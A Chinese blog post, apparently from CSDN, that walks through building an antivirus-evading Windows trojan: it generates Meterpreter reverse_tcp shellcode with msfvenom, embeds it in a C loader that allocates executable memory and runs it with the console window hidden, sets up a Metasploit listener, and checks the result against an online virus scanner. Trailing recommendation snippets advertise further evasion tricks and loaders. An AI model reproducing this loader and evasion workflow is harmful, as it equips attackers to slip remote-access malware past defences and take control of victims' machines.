exe免杀c语言,实验使用 C 编译 shellcode 免杀上线

最新推荐文章于 2024-06-14 09:34:52 发布
最新推荐文章于 2024-06-14 09:34:52 发布
阅读量584 收藏 3
点赞数
文章标签: exe免杀c语言

实验了一下这篇文章里面介绍的免杀方法:[使用 C 编译 shellcode 免杀上线](https://www.xljtj.com/archives/c-shellcode.html?from=timeline&isappinstalled=0)。这篇文章已经把步骤写的很清楚了,但是我会在本文中也记录清楚每一步,因为文章可能说没就没,记下来自己留个备份。顺便记下我遇到的几个mini tiny坑。

# 0x01 环境

- Vs 2019

- windows 10

- kali

# 0x02 msf 生成 shellcode

```

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机器IP(MSF的反弹IP) LPORT=攻击机器端口(MSF的反弹端口) -f c > shellcode.c

```

![title](https://leanote.com/api/file/getImage?fileId=5e9bab12ab64410e3d0012f8)

# 0x03 用 VS 生成可执行文件

这里有两个很小的点:

因为我和作者VS版本和目标环境的区别,第一,我在VS 2019里生成`控制台应用`的时候,是默认不带头文件的。所以在生成程序中,没有`pch.h`这个头文件。解决方法很简单,直接把`#include "pch.h"`这一句代码删掉就好。

![title](https://leanote.com/api/file/getImage?fileId=5e9baea9ab6441104c0012ee)

![title](https://leanote.com/api/file/getImage?fileId=5e9baf14ab64410e3d0013cd)

第二,如绿框中的`代码生成`→`运行库`选项及编译配置:

![title](https://leanote.com/api/file/getImage?fileId=5e9bb680ab64410e3d00152f)

如果我这么选,注意这里编译配置是`Debug x86`,那我可以成功生成exe,但是在运行的时候无法成功执行,目标机器上报错如下:

![title](https://leanote.com/api/file/getImage?fileId=5e9bafdeab64410e3d0013f9)

![title](https://leanote.com/api/file/getImage?fileId=5e9bafe6ab6441104c001324)

解决办法也不难:

- 项目`属性`→`代码生成`→`运行库`选 **多线程(/MT)**

- 编译配置选 `Release x86`

![title](https://leanote.com/api/file/getImage?fileId=5e9bb02eab6441104c001332)

------------

具体操作如下:

打开 vs2019,新建项目→`控制台应用(C++)`。

然后把 shellcode 复制到下面的代码里(我删掉了不存在的头):

```

// MSF.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。

#include

#include "stdio.h"

#include "Windows.h"

#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"") //去除窗口

//步骤b所在桌面产生的 shellcode.c的内容;

unsigned char shellcode[] =

void main()

{

//ShellExecute(NULL, _T("open"), _T("explorer.exe"), _T("https://www.baiud.com"), NULL, SW_SHOW);

LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

memcpy(Memory, shellcode, sizeof(shellcode));

((void(*)())Memory)();

}

```

再把 shellcode 全选复制到编辑器的代码框里:

![title](https://leanote.com/api/file/getImage?fileId=5e9bb192ab64410e3d001446)

修改编译配置为:

![title](https://leanote.com/api/file/getImage?fileId=5e9bb1dbab6441104c001388)

修改属性:项目里右键属性 → C/C++ → 代码生成 → 运行库:

![title](https://leanote.com/api/file/getImage?fileId=5e9bb1b7ab64410e3d001450)

保存之后,`重新生成解决方案`,就会生成一个 exe,这个 exe 运行即可上线:

![title](https://leanote.com/api/file/getImage?fileId=5e9bb240ab64410e3d001466)

这里按原作者的编译和运行库配置(`Debug x86 多线程测试(/MTd)`)生成的文件大小是38.5k,按我的配置生成的文件大小是79.0k。

# 0x04 测试上线

MSF 里开启监听:

```

use exploits/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.113.131

set lport 8090

run

```

执行 exe 即刻上线:

![title](https://leanote.com/api/file/getImage?fileId=5e9bb3deab6441104c0013e7)

# 0x05 免杀性检验

查杀网查杀地址:[MSF(2).exe](https://r.virscan.org/language/zh-cn/report/aab7bc6beead5b681de1f59563456e89)

看上去还行:

![title](https://leanote.com/api/file/getImage?fileId=5e9bb498ab64410e3d0014d6)

# 0x06 CS 上线

我也懒得搞了,两个端起起来有点麻烦:

> 如果要用 CS 上线,如下生成 payload:

![title](https://leanote.com/api/file/getImage?fileId=5e9bb516ab6441104c00141f)

后面操作是一样的。

--------------

# 参考链接:

1. [使用 C 编译 shellcode 免杀上线](https://www.xljtj.com/archives/c-shellcode.html?from=timeline&isappinstalled=0),心灵鸡汤君's blog,心灵鸡汤君,2020 年 04 月 18 日

weixin_39540018
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
免杀对抗-成品EXE免杀-反特征码-通用跳转
xiaoheizi的博客
10-04 1438
1.将工具和exe程序放到环境中,启动程序,点击制作测试文件---选择exe程序,点击ok后会在工具目录下生成一个virtest.vir文件。因为目标使用的是火绒,所以我们自己搭建一个火绒环境,使用VirTest工具检测出exe程序的什么地方被火绒杀了。所以需要再次修改特征码处:将保存了00区间修改的exe程序拖入ollydbg工具中,搜索定位特征码汇编地址后四位。22.开启火绒检测,只保存了00区间修改的半成品被杀了。9.定位到特征码处,向下滑动一下,然后选中复制,将特征码的汇编地址保存起来。
Python免杀技术详解
weixin_68789096的博客
11-02 1405
在网络安全领域,Shellcode加载器通常被黑客用于将Shellcode加载到目标计算机的内存中并执行它。这些加载器被安全专业人员、研究人员和安全分析师用于分析恶意软件样本中的Shellcode部分,以便了解恶意软件的行为、目的和潜在威胁。Python的灵活性和强大的库,使得Python逐渐被用于Shellcode的加载和免杀技术。我们可以利用Python中的ctypes库实现shellcode的加载,ctypes是Python的外部函数库。
PengCode:打开EXEShellCode大门的钥匙
gitblog_00086的博客
06-14 257
PengCode:打开EXEShellCode大门的钥匙 项目地址:https://gitcode.com/Mephostophiles/PengCode 在黑客攻防战和软件逆向工程的神秘领域里,有一个名为PengCode的开源项目正悄然成为专业人士手中的利刃。今天,我们来深入探讨这个工具,展示其如何以专业之力,连接二进制世界的两端——从可执行文件到灵活的ShellCode的转变之旅。 1. 项...
MSF编码+VS编译木马免杀
向阳-Y.的博客
03-16 2354
木马免杀
绕过杀软(二)——免杀exe文件(360、火绒免杀
热门推荐
W小哥
06-12 1万+
攻击机: win7 IP: 192.168.32.134 靶机: windows server 2012(安装360、火绒) IP: 192.168.32.133第一步:使用njRAT生产一个客户端exe木马 输入回连端口号8888,点击start 配置客户端木马的回连地址:192.168.32.134 将文件保存在桌面 开启360杀毒,直接报毒,不免杀 1、将生成的客户端木马:Server.exe在 Encryption Tool V3.0中以base64加密方式打开 打开之后,将base6
C++入门基础(上)
weixin_47257473的博客
10-19 683
C语言的基础上引入并扩充了面向对象的概念,发明了一种新的程序语言。为了表达该语言与C语言的渊源关系,命名为C++。因此:C++是基于C语言而产生的,它既可以进行C语言的过程化程序设计,又可以进行以抽象数据类型为特点的基于对象的程序设计,还可以进行面向对象的程序设计.
CS木马免杀技巧分享.pdf
08-11
01Shellcode加载器 02 Powershell免杀 03 利用场景介绍
通过Python实现Payload分离免杀过程详解
01-19
编译exe以后体积过大 实现: msf生成shellcode代码: 将payload给copy下来,去除引号。 \x2f\x4f\x69\x43\x41\x41\x41\x41\x59\x49\x6e\x6c\x4d\x63\x42 \x6b\x69\x31\x41\x77\x69\x31\x49\x4d\x69\x31\x49\x55\...
源码免杀-花指令
08-21
3. **免杀技术的应用**:免杀不仅仅局限于花指令,还包括其他多种技术,如API混淆、壳代码(Shellcode)隐藏、虚拟机绕过等。这些技术组合使用,可以构建更复杂的免杀策略。例如,使用API混淆技术可以改变函数调用的...
JsLoader:js免杀shellcode,绕过杀毒添加自启
05-05
【JsLoader:js免杀shellcode,绕过杀毒添加自启】 JsLoader是一种恶意软件技术,它利用JavaScript代码来加载和执行恶意payload,目的是在用户计算机上绕过反病毒软件的检测并实现持久化。JavaScript由于其普遍存在...
最新免杀360,基于shellcode字符混淆
最新发布
06-22
基于Shellcode的字符混淆是一种常见的技术,用于使恶意代码逃避反病毒软件和其他安全解决方案的检测。壳代码(Shellcode)是一段非常短小的机器码,通常用于实现特定的功能,如创建后门或执行命令行。由于其精简性和...
shellcode帮助工具,直接把exeshellcode
12-29
Shellcode Helper v1.62 Coded by TeLeMan (c) 2008-2013 Usage: schelper.exe [options] Options: -i [input file] input file (Default: stdin) -o [output file] output file (Default: stdout) -s input file format (Default: Auto-Detection) -sb input file format is Binary -sp the input file format's parameters -d output file format (Default: C format) -db output file format is Binary -dp the output file format's parameters -search get the start offset by the pattern: e.g. PK\x03\x04 -soff fix the match offset after searching (Default: 0) -off convert the input file from the offset (Default: 0) -len convert the input file with the length (Default: 0 - MAX) -en [encoder] encode shellcode (Default: XorDword) -de [encoder] decode shellcode (Default: Auto-Detection) -ex exclude characters: e.g. 0x00,0x01-0x1F,0xFF (Default: 0x00) -in incude characters only -ep the encoder's parameters -t [pid] execute or inject shellcode into process for testing -td [pid] execute or inject shellcode into process for debugging -stack put shellcode into stack and execute it (ESP is the shellcode start) -noinfo display no normal messages except error messages Available formats: 0 - C 1 - C(HexArray) 2 - Perl 3 - Python 4 - Ruby 5 - JavaScript(Escape) 6 - VBScript(Escape) 7 - Pascal 8 - MASM(Data) 9 - HexDump 10 - BitString 11 - HexString 12 - HexArray(C like) 13 - Base64 14 - Binary 15 - HexString(C like) 16 - HexString(Escape) 17 - HexString(JavaScript,UNICODE) 18 - URI(ISO-8859-1) 19 - XML(PCDATA) 20 - BigNumber 21 - BigNumber(Hex) 22 - BigNumber(BaseX) 23 - FloatPoint 24 - UnixTimestamp 25 - GUID 26 - MASM(ASM) 27 - NASM 28 - YASM(ASM) 29 - FASM(ASM) 30 - JWASM(ASM) 31 - POASM(ASM) 32 - GOASM(ASM) 33 - GNU ASM Available encoders:
exe转换工具
10-17
很好用的exe转换工具,简单,可以直接把开发后的代码转换成可安装的应用程序
c语言免杀火绒
记录学习,一起进步
11-18 599
c语言随机数异或加密免杀
c语言免杀程序源码,[原创]Window下基于C/C++源码免杀理论及思路(新手篇)
weixin_39531604的博客
05-18 869
作者:冷锋(LengF) –[BHST]博客:www.81sec.com 时间:2011-5-220x00 概述最近搞一个国外的网站,对方是用的赛门铁克的诺顿杀毒软件,而内网又只对外开放了80端口,于是就想着传个端口转发或者端口复用的工具上去,可是一上传就没了。既然已经提权了,又不想轻易放弃这台服务器。于是就想着怎么办了。自己对非源码的免杀不熟悉,于是就想到自己手头有类似于LCX的工具c...
c语言免杀程序源码,【程序源码】用纯C语言实现坦克大战
weixin_30663839的博客
05-18 202
/* time:2017/1/15 *//* edit:www.dotcpp.com */#include#include#include#include#include#define KEY_ESC 0x01#define KEY_SPACE 0x39#define KEY_UP 0x48#define KEY_LEFT 0x4b#define KEY_RIGHT 0x4d#define KEY...
c语言免杀程序源码,ghost源码免杀教程 步
weixin_39605647的博客
05-18 943
远控软件gh0st源码免杀2010-12-13 14:57远控软件gh0st3.6开源了,开源意味着我们可以在此基础上进行二次开发,同时也意味着杀软可以较容易的查杀该款远控***,既然要利用,我们就做好源码基础上的***免杀工作。好久没有来博客了,我把免杀这部分整理了一下,先抛一砖头,有兴趣的朋友可以接着做,也可以和本人交流。序gh0st远控软件采用驱动级RESSDT过主动,svchost参数启动...
现在主流免杀是源码免杀
qingruo_yin的专栏
08-22 6260
2011-05-21 13:07 一、文件特征码定位: 一般我们先用MyCCL把被查杀文件文件特征码定位出来,然后用C32判断定位出来的这个特征码是代码还 是字符串,或者是输入表、输出表、版权信息等…定位在不同的地方,就要用不同的方法来进行源码免杀
总结加载Shellcode的各种方式(更新中!)
xf555er的博客
05-24 2326
异步过程调用(APC)队列是一个与线程关联的队列,用于存储要在该线程上下文中异步执行的函数。操作系统内核会跟踪每个线程的 APC 队列,并在适当的时机触发队列中挂起的函数。APC 队列通常用于实现线程间的异步通信、定时器回调以及异步 I/O 操作。内核模式 APC:由内核代码发起,通常用于处理内核级别的异步操作,如异步 I/O 完成。用户模式 APC:由用户代码发起,允许用户态应用程序将特定函数插入到线程的 APC 队列中,以便在线程上下文中异步执行。
关于域渗透与免杀对抗思考及其常见方式
03-16
域英文叫DOMAIN——域(Domain)是Windows网络中独立运行的单位,域之间相互 访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。 当一个域与其他域建立了信任关系后,2个域之间不但可以按需要相互进行管理,还可 以跨网分配文件和打印机等设备资源,使不同的域之间实现网络资源的共享与管理,以及相互 通信和数据传输。 域既是 Windows 网络操作系统的逻辑组织单元,也是Internet的逻辑组织单元,在 Windows 网络操作系统中,域是安全边界。 域管理员只能管理域的内部,除非其他的域显式地赋予他管理权限,他才能够访问或者 管理其他的域,每个域都有自己的安全策略,以及它与其他域的安全信任关系。 如果企业网络中计算机和用户数量较多时,要实现高效管理,就需要windows域。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值